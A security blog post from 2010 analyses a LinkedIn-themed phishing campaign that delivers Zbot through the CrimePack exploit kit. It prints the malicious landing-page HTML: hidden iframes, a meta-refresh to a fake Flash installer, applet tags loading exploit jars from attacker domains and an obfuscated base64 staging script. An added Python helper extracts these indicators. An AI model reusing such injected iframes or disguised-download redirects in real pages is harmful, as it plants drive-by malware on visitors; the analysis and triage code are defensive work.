Full disclosure: deep technical analysis below. Beware!!!

Sep 29, 2010

Linkedin Phishing Massive Campaign moved to use CrimePack + Zbot.FX

As of 9/29/2010 it seems that the malguys changed the exploit pack used in the massive LinkedIn phishing campaign.

The spam mail was always a “LinkedIn-like” reminder:

[image: the spam mail]

The URL inside refers to http://qfco8kkt.info/, which redirects to http://kerstdisplays.nl/1.html.


At first check, this page was:

BEFORE
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=http://medicineni.com" />
<iframe width="0" height="0" src="http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0"></iframe>

http://medicineni.com -> Pharmacy Express website…


then later changed to:

<body>
<a href="http://dewitnieuws.nl/flash_player_07.78.exe"><img style="border: 0px solid ; width: 499px; height: 158px;" alt="" src="http://dewitnieuws.nl/1.JPG"></a>
</body>

<meta http-equiv="refresh" content="4;url=http://dewitnieuws.nl/flash_player_07.78.exe" />
<iframe width="0" height="0" src="http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0"></iframe>

http://dewitnieuws.nl/flash_player_07.78.exe is Zbot.FX (MD5 4f56196d437be7e1bfecefb92b83872d); Anubis Automated Analysis

The common part, referenced by http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0, took us to obfuscated code that seems to belong to the CrimePack exploit kit:

<html><head></head><body>Loading...<applet code="cpak.Crimepack.class" archive="http://pydukog.co.cc/wiki/jar5.php" width="666" height="300"><param name="data" value="http://pydukog.co.cc/wiki/exe.php?x=jar5"></applet><applet code="Exploit.class" archive="http://pydukog.co.cc/wiki/j.php" width="666" height="300"><param name="data" VALUE="http://pydukog.co.cc/wiki/exe.php?x=jjar"></applet><div id="page" style="display: none">ZnVu Y3 R pb24gSnVtcEF 3YXko K Q0Kew0K CXdpbmRvdy5vcGVuK Cdo dHRwOi8vd 3 d3Lmdvb2d s ZS5jb20 vNDA0Lyc sICd fc2VsZ icpOw0KfQ0KDQpmd W5 jdGlvbiB K R FQoKQ0Ke w0K CXRye Q0KCXs JDQ oJCXZhciB 1 ID0 g J2h 0dHA6IC1KLWp hciA tSlxcXFxw

..

..

aWYgKF9JRTcgJiYgX1hQKQ 0Kew0KC XNldF R pb WV vdXQg KE hDUC wgdGlt KTs N Cgl0aW 0gKz0 gMTAw MDsNCn 0 NCg0KaWYgKF9J RTYpDQp7DQoJc2V0VGl tZW91dCA o TURBQywgdG ltK TsNCgl 0 aW0gKz0g M TAwMDs NCn0NC g 0KD Q ppZiAodGlt I D4 gMCkg dGlt ICs9IDEw MDAwOw0KDQpzZXRUaW1lb3 V 0IChKd W1w QXdhe SwgdG ltK TsNCg== </div><script type="text/javascript" src="http://pydukog.co.cc/wiki/js.php"></script></body></html>
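Added example (not code from the original post or from the kit): a small Python triage helper for the two kinds of pages quoted above. It pulls the meta-refresh target and the 0x0 iframe out of the landing page, the applet class/archive pairs, the param URLs and the script include out of the kit page, and then strips the whitespace salted into the hidden div's base64 so the staging script can be read. The sample HTML is reconstructed from the fragments quoted in this post; only the first and last base64 fragments that actually appear above are decoded, since the '..' elided middle is not on the page.

```python
"""Triage helper for the redirect chain and exploit-kit page quoted in the post."""
import base64
import re
from html.parser import HTMLParser

# Constructed sample: the 'BEFORE' landing page quoted above, reassembled on
# whole lines (the extraction had split attributes across line breaks).
LANDING_BEFORE = """PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=http://medicineni.com" />
<iframe width="0" height="0" src="http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0"></iframe>
"""

# The first and last base64 fragments quoted from the kit page, spaces and all.
# Only these two survive on the page; the elided middle ('..') is not included.
HEAD_FRAGMENT = (
    "ZnVu Y3 R pb24gSnVtcEF 3YXko K Q0Kew0K CXdpbmRvdy5vcGVuK Cdo dHRwOi8vd 3 d3Lmdvb2d s "
    "ZS5jb20 vNDA0Lyc sICd fc2VsZ icpOw0KfQ0KDQpmd W5 jdGlvbiB K R FQoKQ0Ke w0K CXRye Q0KCXs "
    "JDQ oJCXZhciB 1 ID0 g J2h 0dHA6IC1KLWp hciA tSlxcXFxw"
)
TAIL_FRAGMENT = (
    "aWYgKF9JRTcgJiYgX1hQKQ 0Kew0KC XNldF R pb WV vdXQg KE hDUC wgdGlt KTs N Cgl0aW 0gKz0 gMTAw "
    "MDsNCn 0 NCg0KaWYgKF9J RTYpDQp7DQoJc2V0VGl tZW91dCA o TURBQywgdG ltK TsNCgl 0 aW0gKz0g M "
    "TAwMDs NCn0NC g 0KD Q ppZiAodGlt I D4 gMCkg dGlt ICs9IDEw MDAwOw0KDQpzZXRUaW1lb3 V 0IChKd "
    "W1w QXdhe SwgdG ltK TsNCg=="
)

# Constructed sample: the kit page from the post, with the head fragment standing
# in for the full hidden blob.
KIT_PAGE = (
    '<html><head></head><body>Loading...'
    '<applet code="cpak.Crimepack.class" archive="http://pydukog.co.cc/wiki/jar5.php" width="666" height="300">'
    '<param name="data" value="http://pydukog.co.cc/wiki/exe.php?x=jar5"></applet>'
    '<applet code="Exploit.class" archive="http://pydukog.co.cc/wiki/j.php" width="666" height="300">'
    '<param name="data" VALUE="http://pydukog.co.cc/wiki/exe.php?x=jjar"></applet>'
    '<div id="page" style="display: none">' + HEAD_FRAGMENT + '</div>'
    '<script type="text/javascript" src="http://pydukog.co.cc/wiki/js.php"></script></body></html>'
)


class LandingPageParser(HTMLParser):
    """Collects the indicators an analyst wants from pages like the ones above."""

    def __init__(self):
        super().__init__()
        self.refresh_urls = []    # meta refresh destinations
        self.hidden_iframes = []  # src of 0x0 iframes
        self.applets = []         # (code, archive) pairs
        self.param_urls = []      # <param value="http..."> handed to the applets
        self.script_srcs = []     # external script includes
        self.hidden_blobs = []    # text inside display:none divs
        self._hidden_depth = 0
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}   # HTMLParser lowercases names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            for part in a.get("content", "").split(";"):
                if part.strip().lower().startswith("url="):
                    self.refresh_urls.append(part.strip()[4:])
        elif tag == "iframe" and a.get("width") == "0" and a.get("height") == "0":
            self.hidden_iframes.append(a.get("src", ""))
        elif tag == "applet":
            self.applets.append((a.get("code", ""), a.get("archive", "")))
        elif tag == "param" and a.get("value", "").lower().startswith("http"):
            self.param_urls.append(a["value"])
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "div" and "display:none" in a.get("style", "").replace(" ", "").lower():
            self._hidden_depth += 1

    def handle_data(self, data):
        if self._hidden_depth:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "div" and self._hidden_depth:
            self._hidden_depth -= 1
            if not self._hidden_depth:
                self.hidden_blobs.append("".join(self._buf))
                self._buf = []


def decode_hidden_blob(blob: str) -> str:
    """Drop the whitespace salted into the base64 text, fix padding, decode."""
    compact = re.sub(r"\s+", "", blob)
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("latin-1")


def defined_functions(js: str) -> list:
    """Names of the functions the decoded staging script defines."""
    return re.findall(r"\bfunction\s+(\w+)\s*\(", js)


def triage(html: str) -> dict:
    p = LandingPageParser()
    p.feed(html)
    p.close()
    return {"refresh_urls": p.refresh_urls, "hidden_iframes": p.hidden_iframes,
            "applets": p.applets, "param_urls": p.param_urls,
            "script_srcs": p.script_srcs,
            "decoded_blobs": [decode_hidden_blob(b) for b in p.hidden_blobs]}


if __name__ == "__main__":
    for name, page in (("landing", LANDING_BEFORE), ("kit", KIT_PAGE)):
        report = triage(page)
        print(name, {k: v for k, v in report.items() if k != "decoded_blobs"})
        for blob in report["decoded_blobs"]:
            print(blob)
```

Decoding the two fragments shows what the whitespace was hiding: the head defines a JumpAway() that sends the browser to a google.com 404 page, and the tail is a setTimeout chain that staggers the attempts one second apart before calling JumpAway, which is why the landing page makes the victim "wait 4 seconds". The timing alone is a useful detection hint for proxy logs: a redirect to a pharmacy or download URL a few seconds after a hit on a hidden iframe.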

Further analysis will follow...
